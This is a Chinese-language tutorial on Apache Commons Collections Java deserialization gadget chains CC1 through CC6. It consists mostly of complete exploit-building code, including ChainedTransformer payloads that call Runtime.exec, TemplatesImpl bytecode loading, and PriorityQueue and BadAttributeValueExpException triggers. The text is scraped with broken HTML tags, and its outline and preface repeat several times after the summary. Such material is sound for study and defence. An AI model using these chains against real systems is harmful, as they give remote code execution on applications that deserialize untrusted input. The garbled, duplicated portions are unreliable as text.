Apache Commons Collections反序列化漏洞全系列详解<\/h1>

前言<\/h2>
Apache Commons Collections (CC)反序列化漏洞是Java安全领域的重要课题。本文全面解析CC1-CC6漏洞链，涵盖TransformedMap、LazyMap、TemplatesImpl等多种利用方式，深入分析各链的构造原理和利用技巧。<\/p>

环境配置<\/h2>

基础环境：<\/p>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.2.1<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>CC4需要额外依赖：<\/p>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.apache.commons<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections4<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>4.0<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>CC1链分析<\/h2>
CC1有两条利用链：TransformedMap和LazyMap。<\/p>
TransformedMap链<\/h3>
核心组件<\/h4>


InvokerTransformer<\/strong><\/p>

位于org.apache.commons.collections.functors<\/code><\/li>
transform<\/code>方法可实现任意方法调用<\/li>
<\/ul>
InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>});<\/span>
<\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span><\/code><\/pre><\/li>

TransformedMap<\/strong><\/p>

checkSetValue<\/code>方法调用transform<\/code><\/li>
通过decorate<\/code>静态方法构造<\/li>
<\/ul>
Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> invokerTransformer);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

AbstractInputCheckedMapDecorator<\/strong><\/p>

TransformedMap的父类<\/li>
内部类MapEntry<\/code>的setValue<\/code>调用checkSetValue<\/code><\/li>
<\/ul>
for<\/span> (<\/span>Map.<\/span>Entry<\/span> entry:<\/span>transformedMap.<\/span>entrySet<\/span>()){<\/span>
<\/span><\/span>    entry.<\/span>setValue<\/span>(<\/span>r);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

AnnotationInvocationHandler<\/strong><\/p>

JDK内部类，readObject<\/code>中调用setValue<\/code><\/li>
需要通过反射实例化<\/li>
<\/ul>
Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor cl =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>Object o =<\/span> cl.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span>transformedMap);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
完整利用链<\/h4>
反序列化#readObject -> 
    AnnotationInvocationHandler#readObject -> 
        MapEntry#setValue -> 
            transformedMap#checkSetValue -> 
                InvokerTransformer.transform
<\/code><\/pre>
Runtime序列化问题解决<\/h4>
使用ChainedTransformer<\/code>链式调用：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>完整EXP<\/h4>
\/\/ 构造Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造TransformedMap
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"aaa"<\/span>);<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span>null<\/span>,<\/span>chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射构造AnnotationInvocationHandler
<\/span><\/span><\/span><\/span>Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor cls =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>cls.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object o =<\/span> cls.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span>transformedMap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>o);<\/span>
<\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>LazyMap链<\/h3>
核心差异点<\/h4>


LazyMap.get()<\/strong><\/p>

当key不存在时调用factory.transform<\/code><\/li>
<\/ul>
Map<<\/span>Object,<\/span>Object><\/span> lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span>chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

AnnotationInvocationHandler.invoke()<\/strong><\/p>

调用get<\/code>方法<\/li>
通过动态代理触发<\/li>
<\/ul>
<\/li>

利用链<\/strong><\/p>
反序列化#readObject -> 
    AnnotationInvocationHandler#readObject(调用entrySet) -> 
        动态代理调用invoke -> 
            LazyMap.get -> 
                InvokerTransformer.transform
<\/code><\/pre>
<\/li>
<\/ol>
完整EXP<\/h4>
\/\/ 构造Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造LazyMap
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span>chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射构造AnnotationInvocationHandler并创建代理
<\/span><\/span><\/span><\/span>Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor cls =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>cls.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvocationHandler h =<\/span> (<\/span>InvocationHandler)<\/span> cls.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span>lazyMap);<\/span>
<\/span><\/span>
<\/span><\/span>Map maproxy =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>LazyMap.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span>h);<\/span>
<\/span><\/span>
<\/span><\/span>Object o =<\/span> cls.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span>maproxy);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>o);<\/span>
<\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>CC6链分析<\/h2>
特点：不受JDK版本限制，结合HashMap和LazyMap。<\/p>
核心组件<\/h3>


TiedMapEntry<\/strong><\/p>

hashCode<\/code>和toString<\/code>方法调用getValue<\/code><\/li>
<\/ul>
TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "aa"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

HashMap.readObject<\/strong><\/p>

反序列化时调用hashCode<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
利用链<\/h3>
HashMap#readObject -> 
    TiedMapEntry#hashcode -> 
        LazyMap#get -> 
            InvokerTransformer.transform
<\/code><\/pre>
完整EXP<\/h3>
\/\/ 构造Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造LazyMap和TiedMapEntry
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span>new<\/span> ConstantFactory(<\/span>1<\/span>));<\/span>
<\/span><\/span>TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "aa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造HashMap并添加元素
<\/span><\/span><\/span><\/span>HashMap<<\/span>Object,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "bbb"<\/span>);<\/span>
<\/span><\/span>lazyMap.<\/span>remove<\/span>(<\/span>"aa"<\/span>);<\/span> \/\/ 移除key确保触发transform
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 反射修改factory
<\/span><\/span><\/span><\/span>Class c =<\/span> LazyMap.<\/span>class<\/span>;<\/span>
<\/span><\/span>Field factoryfield =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span>
<\/span><\/span>factoryfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>factoryfield.<\/span>set<\/span>(<\/span>lazyMap,<\/span>chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>map2);<\/span>
<\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>CC3链分析<\/h2>
特点：使用TemplatesImpl实现动态类加载，绕过InvokerTransformer限制。<\/p>
TemplatesImpl链<\/h3>


TemplatesImpl.TransletClassLoader#defineClass()<\/strong><\/p>

加载字节码<\/li>
<\/ul>
<\/li>

TemplatesImpl#defineTransletClasses()<\/strong><\/p>

调用defineClass<\/li>
<\/ul>
<\/li>

TemplatesImpl#getTransletInstance()<\/strong><\/p>

初始化加载的类<\/li>
<\/ul>
<\/li>

TemplatesImpl#newTransformer()<\/strong><\/p>

公开方法触发链<\/li>
<\/ul>
<\/li>
<\/ol>
利用链<\/h3>
InvokerTransformer.transform -> 
    TemplatesImpl.newTransformer -> 
        getTransletInstance -> 
            defineTransletClasses -> 
                TransletClassLoader.defineClass
<\/code><\/pre>
恶意类要求<\/h3>
必须继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/p>
完整EXP<\/h3>
\/\/ 加载恶意类
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>Class tc =<\/span> templates.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>Field bytecodesField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodesField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Test.class"<\/span>));<\/span>
<\/span><\/span>byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>bytecodesField.<\/span>set<\/span>(<\/span>templates,<\/span> codes);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置必要字段
<\/span><\/span><\/span><\/span>Field nameField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>set<\/span>(<\/span>templates,<\/span> "test"<\/span>);<\/span>
<\/span><\/span>Field _tfField =<\/span> tc.<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>_tfField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>_tfField.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造Transformer链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造LazyMap和动态代理(同CC1)
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/code><\/pre>使用InstantiateTransformer绕过InvokerTransformer<\/h3>


TrAXFilter<\/strong><\/p>

构造函数调用newTransformer<\/code><\/li>
<\/ul>
<\/li>

InstantiateTransformer<\/strong><\/p>

通过反射调用构造函数<\/li>
<\/ul>
new<\/span> InstantiateTransformer(<\/span>new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates})<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
绕过EXP<\/h3>
\/\/ 构造InstantiateTransformer
<\/span><\/span><\/span><\/span>InstantiateTransformer instantiateTransformer =<\/span> new<\/span> InstantiateTransformer(<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates});<\/span>
<\/span><\/span>
<\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span>
<\/span><\/span>    instantiateTransformer
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 后续构造同CC1
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/code><\/pre>CC4链分析<\/h2>
特点：使用CC4包的TransformingComparator。<\/p>
核心组件<\/h3>


TransformingComparator#compare()<\/strong><\/p>

调用transform<\/code><\/li>
<\/ul>
<\/li>

PriorityQueue<\/strong><\/p>

readObject<\/code>触发比较<\/li>
需要两个元素触发siftDown<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
利用链<\/h3>
PriorityQueue#readObject -> 
    heapify -> 
        siftDown -> 
            siftDownUsingComparator -> 
                compare -> 
                    transform
<\/code><\/pre>
完整EXP<\/h3>
\/\/ 构造TemplatesImpl(同CC3)
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 构造InstantiateTransformer
<\/span><\/span><\/span><\/span>InstantiateTransformer instantiateTransformer =<\/span> new<\/span> InstantiateTransformer(<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>templates});<\/span>
<\/span><\/span>
<\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span>
<\/span><\/span>    instantiateTransformer
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造PriorityQueue
<\/span><\/span><\/span><\/span>TransformingComparator transformingComparator =<\/span> new<\/span> TransformingComparator<>(<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer<>(<\/span>1<\/span>));<\/span>
<\/span><\/span>PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue(<\/span>transformingComparator);<\/span>
<\/span><\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>templates);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射修改transformer
<\/span><\/span><\/span><\/span>Class c =<\/span> transformingComparator.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>Field transformingComparatorfield =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>"transformer"<\/span>);<\/span>
<\/span><\/span>transformingComparatorfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>transformingComparatorfield.<\/span>set<\/span>(<\/span>transformingComparator,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>priorityQueue);<\/span>
<\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>CC2链分析<\/h2>
简化版CC4，直接调用newTransformer<\/code>。<\/p>
关键差异<\/h3>
InvokerTransformer<<\/span>Object,<\/span>Object><\/span> invokerTransformer =<\/span> new<\/span> InvokerTransformer<>(<\/span>
<\/span><\/span>    "newTransformer"<\/span>,<\/span> new<\/span> Class[]{},<\/span> new<\/span> Object[]{});<\/span>
<\/span><\/span><\/code><\/pre>CC5链分析<\/h2>
特点：利用TiedMapEntry的toString方法。<\/p>
核心组件<\/h3>

BadAttributeValueExpException<\/strong>

readObject<\/code>调用toString<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
利用链<\/h3>
BadAttributeValueExpException#readObject -> 
    valObj.toString -> 
        TiedMapEntry#toString -> 
            getValue -> 
                LazyMap#get -> 
                    transform
<\/code><\/pre>
完整EXP<\/h3>
\/\/ 构造Transformer链和LazyMap(同CC6)
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>
<\/span><\/span>TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "qq"<\/span>);<\/span>
<\/span><\/span>lazyMap.<\/span>remove<\/span>(<\/span>"qq"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造BadAttributeValueExpException
<\/span><\/span><\/span><\/span>BadAttributeValueExpException badAttributeValueExpException =<\/span> 
<\/span><\/span>    new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Class b =<\/span> badAttributeValueExpException.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>Field bfield =<\/span> b.<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>bfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>bfield.<\/span>set<\/span>(<\/span>badAttributeValueExpException,<\/span> tiedMapEntry);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射设置factory(同CC6)
<\/span><\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 序列化与反序列化触发
<\/span><\/span><\/span><\/span>serialize(<\/span>badAttributeValueExpException);<\/span>
<\/span><\/span>unserialize(<\/span>"ser.bin"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
CC链的核心是寻找能够从readObject<\/code>触发transform<\/code>方法的调用链。各版本CC链的主要区别在于中间组件的选择和组合方式。理解这些链的关键在于：<\/p>

识别触发点(readObject)<\/li>
找到transform的调用路径<\/li>
解决序列化限制(Runtime不可序列化等问题)<\/li>
绕过防御措施(高版本JDK限制等)<\/li>
<\/ol>
通过灵活组合不同组件，可以构造出适应不同环境的利用链。掌握这些链的原理和构造方法，对于Java反序列化漏洞分析和防御具有重要意义。<\/p>

Apache Commons Collections反序列化漏洞全系列详解<\/h1>

前言<\/h2>
Apache Commons Collections (CC)反序列化漏洞是Java安全领域的重要课题。本文全面解析CC1-CC6漏洞链，涵盖TransformedMap、LazyMap、TemplatesImpl等多种利用方式，深入分析各链的构造原理和利用技巧。<\/p>

CC1链分析<\/h2>
CC1有两条利用链：TransformedMap和LazyMap。<\/p>

TransformedMap链<\/h3>

LazyMap链<\/h3>

CC6链分析<\/h2>
特点：不受JDK版本限制，结合HashMap和LazyMap。<\/p>

CC3链分析<\/h2>
特点：使用TemplatesImpl实现动态类加载，绕过InvokerTransformer限制。<\/p>

恶意类要求<\/h3>
必须继承`com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/p>`

CC4链分析<\/h2>
特点：使用CC4包的TransformingComparator。<\/p>

CC2链分析<\/h2>
简化版CC4，直接调用`newTransformer<\/code>。<\/p>`

CC5链分析<\/h2>
特点：利用TiedMapEntry的toString方法。<\/p>

Apache Commons Collections反序列化漏洞全系列详解<\/h1>

前言<\/h2> Apache Commons Collections (CC)反序列化漏洞是Java安全领域的重要课题。本文全面解析CC1-CC6漏洞链，涵盖TransformedMap、LazyMap、TemplatesImpl等多种利用方式，深入分析各链的构造原理和利用技巧。<\/p>

CC1链分析<\/h2> CC1有两条利用链：TransformedMap和LazyMap。<\/p>

TransformedMap链<\/h3>

LazyMap链<\/h3>

CC6链分析<\/h2> 特点：不受JDK版本限制，结合HashMap和LazyMap。<\/p>

CC3链分析<\/h2> 特点：使用TemplatesImpl实现动态类加载，绕过InvokerTransformer限制。<\/p>

恶意类要求<\/h3> 必须继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/p>

CC4链分析<\/h2> 特点：使用CC4包的TransformingComparator。<\/p>

CC2链分析<\/h2> 简化版CC4，直接调用newTransformer<\/code>。<\/p>

CC5链分析<\/h2> 特点：利用TiedMapEntry的toString方法。<\/p>

前言<\/h2>
Apache Commons Collections (CC)反序列化漏洞是Java安全领域的重要课题。本文全面解析CC1-CC6漏洞链，涵盖TransformedMap、LazyMap、TemplatesImpl等多种利用方式，深入分析各链的构造原理和利用技巧。<\/p>

CC1链分析<\/h2>
CC1有两条利用链：TransformedMap和LazyMap。<\/p>

CC6链分析<\/h2>
特点：不受JDK版本限制，结合HashMap和LazyMap。<\/p>

CC3链分析<\/h2>
特点：使用TemplatesImpl实现动态类加载，绕过InvokerTransformer限制。<\/p>

恶意类要求<\/h3>
必须继承`com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code><\/p>`

CC4链分析<\/h2>
特点：使用CC4包的TransformingComparator。<\/p>

CC2链分析<\/h2>
简化版CC4，直接调用`newTransformer<\/code>。<\/p>`

CC5链分析<\/h2>
特点：利用TiedMapEntry的toString方法。<\/p>